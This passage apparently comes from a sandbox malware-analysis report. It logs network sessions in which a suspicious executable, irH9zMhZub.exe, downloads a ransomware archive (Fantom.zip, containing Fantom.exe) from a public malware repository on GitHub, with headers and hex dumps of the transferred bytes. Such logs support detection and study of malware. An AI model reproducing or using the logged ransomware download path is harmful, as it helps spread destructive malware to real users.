2022-09-29 12:50:09 UTC	749	IN	Data Raw: 77 82 bb 40 4c cc e4 8e eb b4 04 48 62 2f f0 09 86 b6 3f 23 bf d5 c7 ac 58 dd 60 3e 7c 51 4a e0 e2 69 5f 80 d2 7f d4 b3 49 df 51 a5 67 97 94 ec 8b a1 27 db f5 80 3e f4 25 65 13 4d 6d 10 63 d3 09 ff e7 07 ff e5 b0 c1 95 56 3e f1 1e c4 2f f0 ab ee 40 b6 41 57 3e 2a 33 fe b6 82 60 a9 8a f2 b5 a4 55 61 9b 81 d6 f2 14 01 32 f3 aa 9d d2 88 67 96 ca 22 d4 bd 52 cc 3d 99 0e 95 27 22 29 f1 4e 35 01 16 43 ed 45 cb 4f 3c e3 42 04 7a 5b d8 e3 78 63 1a b6 93 f6 8f a4 39 3b bc 37 45 2f f3 cc 86 b1 49 c9 5a 76 e4 84 35 e3 2b fb fa 6c 55 18 94 95 79 19 27 8e ad 94 56 00 ba 82 e8 b6 2b 8b 6a 46 e8 46 58 b6 72 b8 5b 88 cb 92 d5 99 dd 17 53 63 f6 d7 71 55 51 a7 20 18 c6 40 59 d9 7b e6 90 e9 84 85 41 61 3e ea 7d e0 95 b8 97 82 af bf d3 d0 c9 de 2d 27 ef 0a e4 8c e0 04 51 8f Data Ascii: w@LHb/?#X`>\|QJi_IQg'>%eMmcV>/@AW>*3`Ua2g"R='")N5CEO<Bz[xc9;7E/IZv5+lUy'V+jFFXr[ScqUQ @Y{Aa>}-'Q
2022-09-29 12:50:09 UTC	765	IN	Data Raw: d3 ac e4 74 31 36 3a e7 8d aa 53 56 eb 73 62 67 c6 d6 8b f3 ae b0 bc 6a 96 22 1a ac 4c 5e 60 d4 94 4b 20 9d 1d ce 6f 17 c3 a5 db 4a 07 10 d7 c9 e9 48 fd cb 1b 7a f6 7b b0 38 5d 3f 3e 5c bd a5 65 cd 19 66 0e f6 3a 71 da 07 e7 69 fa 1e c8 27 79 d6 3e e1 e2 36 7b ea 00 44 0f d3 a1 94 69 54 88 73 54 7b fd e0 15 a1 f9 06 e9 c5 67 39 24 87 1e cf ed 99 37 60 09 18 f1 c3 6a f6 32 f4 bc 76 79 7f 56 ba 04 6b 1b cd f6 2e 55 ea 44 59 1c 47 e3 cc 76 b8 85 50 24 bd da fe 3c 43 a6 2a 64 06 ac 43 10 28 2a 25 c3 d9 ea fd e6 ab c2 73 ce 5a bc 1c d8 ac f7 27 50 9d a7 d9 6d 2f 0c 9d 28 e2 77 cf ee d6 de a6 fa 77 88 54 a6 71 db 71 a3 ab 34 86 a2 47 fd ed ff 7b 12 14 3b 80 df da 24 02 0f a8 49 d3 e7 8f 3b d5 58 46 c3 af 3f de 14 48 92 07 04 a3 01 2e f2 7f 6a b7 e9 00 f9 7e d8 Data Ascii: t16:SVsbgj"L^`K oJHz{8]?>\ef:qi'y>6{DiTsT{g9$7`j2vyVk.UDYGvP$<CdC(%sZ'Pm/(wwTqq4G{;$I;XF?H.j~
2022-09-29 12:50:09 UTC	781	IN	Data Raw: 5d 2d dc bb 34 7f de da 8a e8 82 58 b1 af 86 37 e8 fc 5a 79 f4 f4 c9 0f 03 9c 4c 34 7d aa 92 de 6a a0 fb 33 7c 20 ad 0b ff 08 75 0d a7 1b 05 dd f0 f2 78 7d f9 81 15 ec b3 a4 17 ef c2 64 9a f5 9c 41 10 20 95 cb fd a6 60 0d c9 34 98 4b 45 e0 be 15 4a b6 a9 fa 5e dd ba c6 7d 27 6b 7f 02 e3 ff f7 67 54 3f 25 24 1b 39 25 e9 cf b5 8b 88 e7 46 bc fe 58 f0 14 99 6b 49 e9 46 ec a7 aa 14 8c 12 1a 02 8e bd 16 ac 2c cf fe 31 35 e8 3e 3b e0 d9 f5 6d 8f 6b 0d 43 99 9a 7f 97 ac 6d 3f 80 bb c1 0a f5 03 01 37 62 3d f2 0e 4a 38 29 7a a1 eb 30 a5 e8 82 54 d6 ae 7a 13 ed a1 22 b9 9a 93 7b e7 52 24 15 06 94 30 1b 2a d9 18 b9 3b 21 9b 62 4c 5e 82 85 86 44 26 d5 0d 5a 50 63 da ea 41 d0 c9 15 c1 54 ce c0 1e cb cd 4c 7d bc cd 0b 83 08 16 79 52 97 fa 6a ef 32 29 20 81 e7 dc 46 2a Data Ascii: ]-4X7ZyL4}j3\| ux}dA `4KEJ^}'kgT?%$9%FXkIF,15>;mkCm?7b=J8)z0Tz"{R$0;!bL^D&ZPcATL}yRj2) F
2022-09-29 12:50:09 UTC	797	IN	Data Raw: d1 b4 e6 05 4e 6f c0 f0 9a 2d ae ab af 79 ac 93 c8 5a af 81 ee 2d 78 80 72 fe 44 67 3d a5 5f 34 61 e2 c0 89 c5 22 9b e2 82 3d 4c a1 5d a9 86 08 8a 1e 6d 0e b6 a9 5a d3 80 e6 44 56 54 0e 17 16 a3 41 dd 29 36 05 59 b8 d1 fa bf 6b 18 93 e0 56 97 dd 73 0f af aa 5b b6 0e c9 02 82 10 a1 0b 4f a7 3f 32 4e 6d f5 fb a7 64 59 43 02 d0 cd 44 e5 04 22 b4 72 e4 86 e6 8e a9 d5 e9 51 04 38 d8 03 6b b0 7e aa b1 6b 65 4c e7 b3 4d 80 ec 9b a8 1f da fc d3 02 c7 f3 aa e9 f7 3a 65 58 41 4e ac ae c7 d9 14 83 e2 8d 47 df 9f 23 8a 3a 25 c8 53 7b 5a 2a ac 78 81 90 49 9b ea b9 29 70 98 fb 00 e1 3a f0 cd cd 6c dd 7c e0 fc 36 26 91 21 21 50 70 66 5e ab dd e8 6a 04 f6 7d b3 19 1c b6 a1 cb ac 44 f2 25 5d f5 f1 17 d9 be 27 79 a4 f4 65 73 88 bc d2 36 81 8d 8a 40 05 3e 51 05 7d fa c4 eb Data Ascii: No-yZ-xrDg=_4a"=L]mZDVTA)6YkVs[O?2NmdYCD"rQ8k~keLM:eXANG#:%S{Z*xI)p:l\|6&!!Ppf^j}D%]'yes6@>Q}
2022-09-29 12:50:09 UTC	813	IN	Data Raw: b0 52 5c ed 9c 2b 41 4d a9 96 bd 1b e2 bc 49 e4 1b 7c 8c 97 28 20 17 40 98 13 e7 42 85 97 38 6c cc 3b 33 d0 d9 1c 39 54 09 51 32 6e 9c a4 15 34 45 fa da 1e e1 2f 28 ac 3d 38 62 38 08 ab 5c 50 f5 a3 44 97 f2 47 2a 4f 5e ad 15 aa bd 46 cc 0a 26 70 48 68 ea f3 48 fd 70 ef 1f d9 26 92 09 61 15 9c 68 77 26 ef d7 05 82 48 c0 df 31 bb 1a 9c ac d2 cb b0 7b 56 33 73 01 ee 4d 29 b2 91 e6 d7 a8 66 a0 77 ed a4 1b 13 92 5d 60 c5 f4 79 e5 bc 2f d6 3d bd e7 89 df 34 57 e1 cd fc ce 08 9d df c8 ef dc 31 f8 8b 2f 18 96 56 fb 68 9c cc c0 c9 7d 55 7d ae 1f 1a 65 aa 0c c8 9d 9c 20 6c 46 c0 5d c1 22 09 e2 4f c0 d8 9b ed b8 73 a0 19 70 44 88 a0 8b c1 77 32 dd 84 5a ef 6d ce b1 75 f4 c4 35 31 99 37 46 eb 6b 65 db 76 97 6c b9 9d f0 66 c5 ef 8e 97 f4 06 82 61 85 1c e7 29 36 ef e9 Data Ascii: R\+AMI\|( @B8l;39TQ2n4E/(=8b8\PDG*O^F&pHhHp&ahw&H1{V3sM)fw]`y/=4W1/Vh}U}e lF]"OspDw2Zmu517Fkevlfa)6
2022-09-29 12:50:09 UTC	829	IN	Data Raw: c8 29 1a 05 f9 a1 95 0e 42 08 1c 2d ca 36 e7 56 8b 87 4b 8e e8 ef 0e a3 d2 6f 82 ab f2 50 cd ac 81 23 9f 55 76 71 c5 7d 15 6f b0 69 5e 0c 9b 77 90 93 04 11 fb dd 8d cc 14 e5 31 85 e9 8d 6c d2 5b 9e 19 1f c7 07 26 af c2 01 7c d8 37 a2 b0 67 f3 11 18 fd 23 85 e3 06 14 62 66 db 55 d8 43 8a 00 fd 1a f4 d9 08 54 2f b2 32 6b ba 81 0a 4d 9c 1f bf dd 52 09 15 d0 8e 2f 98 1e ae 3d 8d c7 aa 1b 08 a6 ff c6 55 51 aa 4c 9c 27 c3 1c 05 78 4f de 6d d7 ed fa b9 cb 83 25 69 3b f6 b6 50 8f 10 e7 6a c9 85 4a 59 77 6d 68 16 4e fb 61 75 0d 31 46 e0 30 86 0e a8 4e 3a bf 6c 59 e8 94 84 b7 7a 72 b1 06 bf 26 47 12 ca ca f5 98 34 52 42 11 c5 fa 9c bd a4 6e 1e 5c 75 99 33 db 6f 24 61 07 f8 35 a5 31 59 d4 20 35 e4 62 cc 13 9d 0f b7 3a 02 6f a7 70 cf 15 4c aa 7f ac e8 29 fe 57 ef a6 Data Ascii: )B-6VKoP#Uvq}oi^w1l[&\|7g#bfUCT/2kMR/=UQL'xOm%i;PjJYwmhNau1F0N:lYzr&G4RBn\u3o$a51Y 5b:opL)W
2022-09-29 12:50:09 UTC	845	IN	Data Raw: 68 c9 4d a8 c1 39 e9 04 42 7a 37 a2 cb 1c 62 1c 43 35 85 0b 11 cc 7f 80 79 86 c1 4c 51 ae 18 f3 ab 4e 2d 20 57 12 ce 89 cf 8e 29 33 9e 15 7e c5 52 cd e5 35 44 88 4a 57 9b 4d bf 3d 45 9e a6 f7 fa 93 87 02 86 3a 1d d3 e8 55 0f 85 ee 61 a7 42 e9 60 ab fc 87 ba 7b 03 c7 43 fe 86 26 bc 6f 24 11 5b c4 fd d9 c4 e0 bf 76 b3 5c 8b 45 8c 6c fe 90 f6 bb 44 25 a3 2e 7b 76 8f d0 4e 11 90 8d 8d 14 82 5f 14 0a 0d d8 18 3e 0c cb 2a 78 5b 45 5f 92 96 73 0d e9 5c 67 2e 02 07 e2 02 34 f0 a9 4f 60 5c af a1 0a 9c 83 fa f5 d4 6f b8 1e f3 eb 29 de 3e 87 6b e5 ca 9f 97 31 42 0a 8e 13 9e d5 81 43 be 79 37 61 f1 7a 2f e9 96 59 0e cf f5 bb f3 19 e2 a6 e4 42 bf cc 5d 3a 95 2d 04 30 0b 80 30 d4 7d 82 35 26 99 e9 e2 3b 5f 17 f3 43 83 40 df 96 b0 ee 49 44 f2 2d 08 19 59 e5 6f 9d 4f fb Data Ascii: hM9Bz7bC5yLQN- W)3~R5DJWM=E:UaB`{C&o$[v\ElD%.{vN_>*x[E_s\g.4O`\o)>k1BCy7az/YB]:-00}5&;_C@ID-YoO
2022-09-29 12:50:09 UTC	861	IN	Data Raw: 51 f8 42 3d ce 92 73 b6 78 ef 3d 07 56 1d 27 cc c3 ff 69 a2 4c 72 70 6d e1 0c 08 c2 59 90 0b 4a 3f ef ec 96 47 79 67 30 09 40 86 bf 75 b4 30 ab e1 8a 80 dc e3 6d d0 4a 83 86 a5 02 6f 99 d0 06 9b 3e 3f 65 7e aa 18 07 16 63 46 ed 17 bf e3 8f 63 4d e9 f8 7f d0 2f ab 63 e9 6f fa ae 83 db 1e 5e 34 10 d3 d0 2b 00 d7 db 1d 2a 75 54 1e 48 7c 46 51 2b 2d f3 c2 5e af ad e8 67 15 03 bc bc 2b 37 8f 0e dc 53 be 3b cf b4 98 50 f1 6e 15 dd ac 62 40 08 14 d1 f0 17 87 10 ef 29 0d e0 7b c8 4f 6c 07 e2 e9 8f f2 3a 17 26 f8 a8 07 3b 31 4b 1e 5b 7a a3 1c 0a 43 e7 ee 9d 26 64 aa 91 be 8e fd 0c a8 62 ef f4 37 5a 82 cd 4c 0c be 04 d8 42 98 89 84 8e d5 19 aa 5c 91 08 28 c2 00 51 c4 b8 e4 a2 08 15 28 75 9c d7 2c eb 63 6b cf 5b 69 83 6b df 25 73 17 5d 4a d4 b5 65 1b 64 71 db 63 5d Data Ascii: QB=sx=V'iLrpmYJ?Gyg0@u0mJo>?e~cFcM/co^4+*uTH\|FQ+-^g+7S;Pnb@){Ol:&;1K[zC&db7ZLB\(Q(u,ck[ik%s]Jedqc]
2022-09-29 12:50:09 UTC	877	IN	Data Raw: a5 e1 6f 96 ed aa b5 bf 9c 3f 38 44 e2 f5 54 2b 86 bf df f1 8b e9 fe 25 0c c9 4d 1d 4a 26 2a 71 40 c8 ab 67 61 a6 06 b7 e6 5b 63 84 1b f9 5b 24 45 2f 67 cf eb 57 a8 65 00 71 c2 41 98 92 85 0f 5f 2a ca 3b b3 3d d8 95 04 c0 4c b6 5b bf 7d 79 b5 7d 30 9f ac 9b b3 a8 c5 28 e7 60 72 b5 9f a1 6c 54 66 e8 43 a0 4b 3a a5 53 0d 43 be ad 2e 9b e5 2d 26 91 d3 12 1c 20 78 c0 69 51 8c e5 99 f1 a7 31 a1 74 b2 d3 99 c3 67 32 1b bb 76 04 db 95 de 1f 45 db c2 e5 49 29 27 50 c2 a5 52 7f c9 b3 48 89 52 48 25 43 5e d7 f1 c8 c5 20 59 ac 89 8e 69 5d 65 ef a8 cb 3b 47 70 a5 7c 72 a9 4c 22 19 2b 56 ac 7f bc 20 7f 10 d9 56 36 3f 3c cb 7b 20 4a 05 bb 8a 5a 35 7b f6 2f ea fb 81 e3 c4 4a 7f 7c e8 d2 fc e0 16 dc f3 88 ef 48 67 5a 3a 31 df 61 78 53 a3 c7 dc 10 c7 1d d5 74 0c 03 a4 5c Data Ascii: o?8DT+%MJ&q@ga[c[$E/gWeqA_;=L[}y}0(`rlTfCK:SC.-& xiQ1tg2vEI)'PRHRH%C^ Yi]e;Gp\|rL"+V V6?<{ JZ5{/J\|HgZ:1axSt\
2022-09-29 12:50:09 UTC	893	IN	Data Raw: 31 2b c7 2c e9 a3 ad 6f 86 ba 30 a8 45 5c 7a 88 73 e3 75 34 7d 65 92 6c 20 9c 21 41 29 b1 1c 8e 7f e2 18 b0 26 34 9b 92 35 a1 78 d3 4e 02 9b 91 b0 f8 53 bb 7b 2b f0 40 03 25 b4 76 4c f0 90 a4 58 03 7d 39 e9 52 ed 6c 18 97 68 4d 67 f1 3d b6 d6 0f cf 3c 23 d2 58 4c 9c 0b 47 5d 5b ee fc 36 8c 70 ec 8a 4f 33 8a de c6 67 5c f8 3e f1 b5 2a aa 2c ee e4 66 58 80 58 95 37 86 77 cb 98 ee d3 70 76 3e 26 e6 cb 1f 5a 7e 55 4d b4 fd 5e 3f 0c a6 96 9e 3f 36 bd ad 6f 05 30 cb 76 fe 52 33 8c 47 8d ec 2f 4e 33 d4 2b b0 9c 5c 4b 31 a3 a1 70 0c 8c 3b 3e 24 02 30 6d 18 dc 81 a1 41 5f fd 3f 3d 2e 87 ba a5 b4 80 c3 b0 84 0f 18 c7 44 12 2b a2 fa c6 fc 03 55 ed db 7d a5 f2 81 cb 99 8d 54 de 68 7b 51 7f 69 d6 0c ec 0b 22 4c 2d d5 94 14 b0 90 1d 4c db 34 75 42 10 97 51 11 f8 76 19 Data Ascii: 1+,o0E\zsu4}el !A)&45xNS{+@%vLX}9RlhMg=<#XLG][6pO3g\>*,fXX7wpv>&Z~UM^??6o0vR3G/N3+\K1p;>$0mA_?=.D+U}Th{Qi"L-L4uBQv
2022-09-29 12:50:09 UTC	909	IN	Data Raw: 5b 26 5f 81 12 55 a6 7b 89 e1 dc 68 9c bc ba 51 41 8e 2c 3f 68 71 ad 98 14 b4 78 e5 06 db 6d 3e cd 00 54 cf 86 55 bf 1b 61 8e 16 7c 74 3a 16 85 29 fa 32 05 f3 1e 34 fa c2 bc 73 c9 ff 2b be 2b c1 db c4 bd 51 05 20 9b 48 6e 95 86 63 8c 5a ad 0f 40 06 03 3e f1 42 fd f6 45 17 53 7f f4 a4 db 90 14 f5 cc a6 61 93 d5 1b 45 38 ad ea e6 33 2a 95 09 b2 bb 29 9d 86 1a 80 d9 45 b7 bf 45 e0 83 8b ab 1f c7 30 aa 46 a4 96 b5 0c b0 de 63 e9 77 2f 5e 63 a6 1a e0 08 01 24 d9 4b a9 41 b5 93 b0 e4 f4 76 38 17 ff 04 56 d2 d1 19 92 87 ee 3b c2 6b fa cf c2 a0 f5 bb 84 46 16 d0 6d 36 53 b6 b9 85 33 29 ee 17 98 c2 80 61 28 e5 0a ed 12 81 b9 59 95 16 df f5 ee 33 39 c2 34 c8 b0 cc 1f 69 c2 c7 62 71 9c 98 09 8b 4b f1 8f ee e3 bf 8b 1d 3b 0c e1 30 c7 04 19 b1 8f 8c 47 8b a2 06 a0 07 Data Ascii: [&_U{hQA,?hqxm>TUa\|t:)24s++Q HncZ@>BESaE83*)EE0Fcw/^c$KAv8V;kFm6S3)a(Y394ibqK;0G

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.6	49744	140.82.121.4	443	C:\Users\user\Desktop\irH9zMhZub.exe

Timestamp	kBytes transferred	Direction	Data
2022-09-29 12:50:14 UTC	911	OUT	GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Fantom.zip HTTP/1.1 Host: github.com
2022-09-29 12:50:15 UTC	912	IN	HTTP/1.1 302 Found Server: GitHub.com Date: Thu, 29 Sep 2022 12:50:15 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With Access-Control-Allow-Origin: https://render.githubusercontent.com Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Fantom.zip Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: no-referrer-when-downgrade Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
2022-09-29 12:50:15 UTC	912	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.6	49745	185.199.108.133	443	C:\Users\user\Desktop\irH9zMhZub.exe

Timestamp	kBytes transferred	Direction	Data
2022-09-29 12:50:15 UTC	914	OUT	GET /Endermanch/MalwareDatabase/master/ransomwares/Fantom.zip HTTP/1.1 Host: raw.githubusercontent.com
2022-09-29 12:50:15 UTC	914	IN	HTTP/1.1 200 OK Connection: close Content-Length: 203087 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: application/zip ETag: "0f6cd0c854741d82e79b6fae3ecfc41f9b92740bab354e2ee252955917725cf0" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: 0846:E4BC:5E09CA:68A9EF:63359324 Accept-Ranges: bytes Date: Thu, 29 Sep 2022 12:50:15 GMT Via: 1.1 varnish X-Served-By: cache-mxp6942-MXP X-Cache: HIT X-Cache-Hits: 1 X-Timer: S1664455815.166676,VS0,VE213 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * X-Fastly-Request-ID: 0866938ac275de01134e6fcadebb7c343f3e7dc3 Expires: Thu, 29 Sep 2022 12:55:15 GMT Source-Age: 0
2022-09-29 12:50:15 UTC	915	IN	Data Raw: 50 4b 03 04 14 00 01 00 08 00 64 01 cd 4c 5a 74 a2 37 b5 18 03 00 00 16 04 00 0a 00 00 00 46 61 6e 74 6f 6d 2e 65 78 65 22 e7 f0 5b 88 6d 31 c8 1f 0b 7d 88 55 e3 33 f2 2a 91 e5 3a 5c 0e c4 5d 37 ee df 6e 5b a7 3d 5a a3 07 6d 88 45 a4 dc 8e 0a a0 0d 92 93 68 24 00 5c 40 19 4d 80 d5 9b c0 88 7e f4 e8 b1 12 2b e0 d8 eb 5f 40 26 3d 64 73 cf d8 7a 1d c8 74 62 56 d5 b5 6b bc c5 66 0c a3 c2 21 35 45 5c c6 a6 10 d6 9a 5f 61 cd b8 bd e2 41 ee 82 d1 88 dd bf 72 be cc b3 c5 72 36 49 19 d7 76 d2 2d 53 e4 de 95 e6 c9 b4 f0 49 f6 d6 ba f6 d0 5f a3 e9 83 90 3f 14 c4 e8 e9 a9 62 03 42 67 dc d3 0d 07 9f 7e 98 1e 50 4b b2 7a 2c 80 44 b5 9f 42 81 88 d5 88 42 ab ab 3c d2 27 98 7c df c6 d3 8e 82 7a 18 17 a0 bc c6 4a cf 60 40 eb 61 1b d0 ed 8e 15 2f 5e 30 68 c8 39 9a 73 d2 34 Data Ascii: PKdLZt7Fantom.exe"[m1}U3*:\]7n[=ZmEh$\@M~+_@&=dsztbVkf!5E\_aArr6Iv-SI_?bBg~PKz,DBB<'\|zJ`@a/^0h9s4
2022-09-29 12:50:15 UTC	916	IN	Data Raw: 9d a1 23 c2 56 51 00 b0 6d 35 4f 92 bb 15 ab 8f bc 79 27 e8 6a 86 71 01 e0 ef 54 14 7b 97 1c c6 c3 7e af 72 ec 05 50 a3 f6 8a 2d 64 ff c0 58 73 a9 45 21 eb af ba f5 c5 c6 25 18 4d bc 96 42 9c 13 e2 e1 44 03 9f 83 bf ad ad 80 b7 a9 69 e6 97 63 4b fa a7 12 a0 e4 b3 07 37 fb 4f b3 e1 64 a6 e5 aa 93 fb 9e 29 7b a9 24 06 f2 e9 3c 73 0a 0e 1e 6b 57 ca 2c 01 96 93 c0 7a fc 38 6c 6d 06 33 41 96 a5 56 5e 35 2b f1 59 02 1b dc 15 b4 f6 be 3d 5a 29 bd f0 a7 1b f7 ab 64 4e e3 7b b5 b5 af aa 28 71 0c 4d 66 5f e2 da 44 63 0d fe 68 83 0b bb 26 40 ae 82 d0 25 85 cb 7b 0c bd 12 6c f8 32 ca fc ec 91 1e 63 10 c3 96 2b bc be 2f 8c b8 e1 74 3f 3f 08 82 ea 66 45 2d 1d 96 cd 52 24 b3 86 f0 01 a1 e7 e1 6a 6c fc ff b2 fd 80 cb d6 7f b8 6e 98 84 ea bd 20 f7 00 05 48 e4 f5 77 2a 41 Data Ascii: #VQm5Oy'jqT{~rP-dXsE!%MBDicK7Od){$<skW,z8lm3AV^5+Y=Z)dN{(qMf_Dch&@%{l2c+/t??fE-R$jln Hw*A
2022-09-29 12:50:15 UTC	918	IN	Data Raw: 96 bf 66 38 cc 43 d4 13 22 c6 10 02 6f fa 84 7a 7b c3 00 59 d2 cd d8 b9 78 1a 0b c3 fb da 5d ad b1 7b 42 2e 8a 2d 86 d4 41 c7 48 62 82 c5 06 5c e0 65 bb b2 15 0a 45 5e 80 fa 1b 34 a6 68 f2 95 a9 64 c3 cc a1 28 e9 49 b1 09 9b e9 50 1e e9 97 e8 5a ec 6d 95 a6 12 9f 49 d1 35 a9 1b eb 36 0d 53 51 ab 6c d5 d4 04 76 27 29 e7 d4 a3 c1 14 70 55 f2 ac 61 2c ea 9f 3b f9 b6 15 1c 46 7b e0 96 b3 2a 8f 9a 43 e7 fa 4b df 21 bd 48 c6 c1 67 03 f0 3b b8 0a 29 70 42 1c e4 3f e9 5a cc db bd fa 6a 1c c6 08 ec ee 5c f8 a7 69 e3 00 02 32 24 59 e8 d2 49 5f 25 83 ba 3c 70 6e eb 24 10 c1 11 86 6a 1f 22 2e e0 be c9 f4 05 de 52 1b 23 ba 1d 87 39 45 84 fc 2a 54 40 9f 79 52 dc 62 e9 09 82 ad 4e f1 0b 38 8e 96 bd 26 f5 19 4f ec 81 d6 94 bf 51 51 9e 7b 47 3d f4 e4 10 32 b5 50 ca ee 71 Data Ascii: f8C"oz{Yx]{B.-AHb\eE^4hd(IPZmI56SQlv')pUa,;F{CK!Hg;)pB?Zj\i2$YI_%<pn$j".R#9ET@yRbN8&OQQ{G=2Pq
2022-09-29 12:50:15 UTC	919	IN	Data Raw: da a9 e5 4d bd cb 45 0c 40 34 66 b9 88 d0 06 7e 4b 8c 89 ec c1 44 b7 1f bc 02 1d c0 e9 f1 47 55 dd 2b 8a e7 08 01 f6 0f ff 06 98 55 66 28 bd a2 fc cb 7f a8 64 72 5c 52 08 bf d5 f1 14 c8 40 7b 60 d1 94 38 fb a7 c5 e4 6e 92 ce 61 41 5f 6e 27 79 b7 e0 f5 37 2f ef e1 82 4f 3f 05 54 f1 e2 ea 2f 61 9c ea c0 aa 61 dc 6d fc 99 fe 2c 67 7a 9e ec 70 c7 93 1e 03 64 b4 58 63 d6 a9 99 1c c8 b2 cc 7a c6 f6 0d 82 44 07 e5 47 f1 87 26 de 56 ac 55 61 31 bd 8c e3 f0 d3 c4 d1 22 4f 80 99 c9 ea 9d 6f 79 04 51 c8 e7 66 ff a8 b6 1b f6 62 43 b3 5b 96 74 b1 96 57 d6 cd c2 e4 24 4a 90 fd 60 e1 ca fe c0 b0 16 45 e0 2c d9 51 e3 12 3d 8b 98 09 c2 3a a4 12 a9 70 14 8f 37 21 13 66 14 82 e3 3d 0a b8 8b d7 67 c4 78 90 85 3f fa 95 6d 19 7f 07 3f 4b 2f ab 55 ee f5 43 32 64 0d fa 45 b2 e4 Data Ascii: ME@4f~KDGU+Uf(dr\R@{`8naA_n'y7/O?T/aam,gzpdXczDG&VUa1"OoyQfbC[tW$J`E,Q=:p7!f=gx?m?K/UC2dE
2022-09-29 12:50:15 UTC	920	IN	Data Raw: 33 f5 ca 3b 57 f9 04 3f c4 9f 94 ce 28 77 a4 b7 52 ad 5a fa 98 8d 75 5b e5 bd 8d 2a 9b bf 23 55 83 2c 42 c7 cc f8 97 b3 11 9b a3 fb 71 08 98 5d 1c 03 9d ca bb e3 1e 89 29 42 e6 48 7f 6f fd 92 ca b2 48 b2 64 f2 8b f7 cf bd a4 a9 77 e4 01 57 f2 2a 56 64 11 8d 88 0e 5c 60 71 a9 c4 30 a5 13 10 db 4b 0a 15 a1 bd 50 0e 94 fd 26 98 64 6f 8c 3e 2f 8a cb 27 d0 af be 1e 14 56 5d 41 08 51 59 26 bd 72 e8 44 cd 28 3d 71 6f 8f db 39 a6 5f 7a 48 e9 db 9d 8d 30 c1 dc de 84 55 35 23 ba de 94 a3 ae 83 0e ed d6 b4 f0 f0 7e ee 93 38 e8 14 7a 76 85 6a 9d 58 81 b5 ee 32 ed 52 18 87 aa d0 b1 14 04 45 37 81 54 a1 a3 a5 2c 57 17 c9 a7 a0 9f 8b b1 d2 64 97 f1 ac 27 71 3c 99 1d 96 50 13 9c e7 96 19 3c 1a 91 09 9e 62 91 b8 0b 93 80 6f a2 7c 42 74 d4 28 b4 8e 64 83 65 fb 8f 79 41 28 Data Ascii: 3;W?(wRZu[#U,Bq])BHoHdwWVd\`q0KP&do>/'V]AQY&rD(=qo9_zH0U5#~8zvjX2RE7T,Wd'q<P<bo\|Bt(deyA(
2022-09-29 12:50:15 UTC	922	IN	Data Raw: 2d 29 47 15 79 29 ab 37 7c c1 a3 61 9a 0b ce d5 9f ce 03 be 8e 18 ee 14 e9 94 8b bc 57 e4 85 c6 02 59 d9 0a 0e 6e 4d a8 c8 e8 3f f2 1c fa f8 4d e5 e2 5d eb b3 78 70 4a a0 6c 4c b8 ce 10 ee b2 f8 3a 55 ac 84 00 f9 e9 ff b0 2a 90 97 a3 31 98 48 3f 9b 29 55 c6 ab 4d c6 e6 92 17 db b8 2a 56 90 e7 18 94 cf fd 5d 6e 7f 7c 55 16 1d 67 bd d9 9b 7a 94 58 0d f7 ac b1 4f 10 4d 05 90 74 b7 f8 f6 0e e6 4c 9f 53 5c fc 5a 06 16 1f 77 6b b6 2b 4c 6a 7a c1 4a 22 97 7e c5 14 17 81 e8 80 bc 43 4f a3 a2 4f 51 37 60 fd 94 37 39 94 fe c7 8e 58 44 fe ed cc 35 d2 34 af 8e e7 1d 9e 14 f4 93 d3 b9 72 c7 cb 4a b8 82 d9 5e 0f b4 bf 43 8b 45 14 ef 20 69 e8 fa 87 a5 de 15 93 0e 54 05 d6 c2 77 c8 6c 86 c5 3d f2 17 37 26 8c b5 ff 61 97 42 a7 52 e5 97 e2 c7 24 2e ab ec 7d 65 78 8f 00 54 Data Ascii: -)Gy)7\|aWYnM?M]xpJlL:U1H?)UMV]n\|UgzXOMtLS\Zwk+LjzJ"~COOQ7`79XD54rJ^CE iTwl=7&aBR$.}exT
